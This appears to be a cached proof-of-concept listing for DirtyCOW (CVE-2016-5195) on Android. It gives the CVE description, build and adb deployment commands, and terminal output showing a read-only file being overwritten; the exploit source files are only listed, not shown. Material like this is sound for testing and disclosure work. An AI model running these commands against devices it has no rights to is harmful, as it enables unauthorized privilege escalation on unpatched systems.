POC details: d4cd48bf5abaff57cb032986896d38f7d3ad49d8

Source
Related vulnerability
Title: Linux kernel race condition vulnerability (CVE-2016-5195)
Description: Linux kernel is the kernel used by Linux, the open-source operating system of the Linux Foundation (USA). A race condition vulnerability exists in the mm/gup.c file of Linux kernel 2.x and 4.x versions before 4.8.3; it stems from the program not correctly handling copy-on-write (COW) writes to read-only memory mappings. A local attacker can exploit this vulnerability to gain privileges.
Description
DirtyCOW Exploit for Android
Introduction
# demo1

This demo is based on https://github.com/timwr/CVE-2016-5195

`make test` output:
```
user@user:/$ cd /home/user/demo1 && make test
/home/user/adb/android-ndk-r21d/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=x86_64 APP_PLATFORM=android-23
make[1]: Entering directory '/home/user/demo1'
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
make[1]: Leaving directory '/home/user/demo1'
adb push libs/x86_64/dirtycow /data/local/tmp/dcow
libs/x86_64/dirtycow: 1 file pushed. 8.8 MB/s (10408 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed. 0.5 MB/s (367 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2020-12-29 23:01 test
-rwxrwxrwx shell    shell         367 2020-12-29 18:24 test.sh
-r--r--r-- shell    shell          18 2020-12-29 23:01 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x7ff91dc4f000
[*] currently 0x7ff91dc4f000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7ff91dc4f000 18
[*] madvise = 0 5082
[*] /proc/self/mem 1431270 79515
[*] exploited 0 0x7ff91dc4f000=626172656e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a
```

File snapshot

```
[4.0K] /data/pocs/d4cd48bf5abaff57cb032986896d38f7d3ad49d8
├── [ 346] Android.mk
├── [5.2K] dcow.c
├── [ 990] Makefile
├── [1.6K] README.md
├── [1.1K] run-as.c
└── [ 360] test.sh

0 directories, 6 files
```
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the POC through the source first.
    2. If the source has expired or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.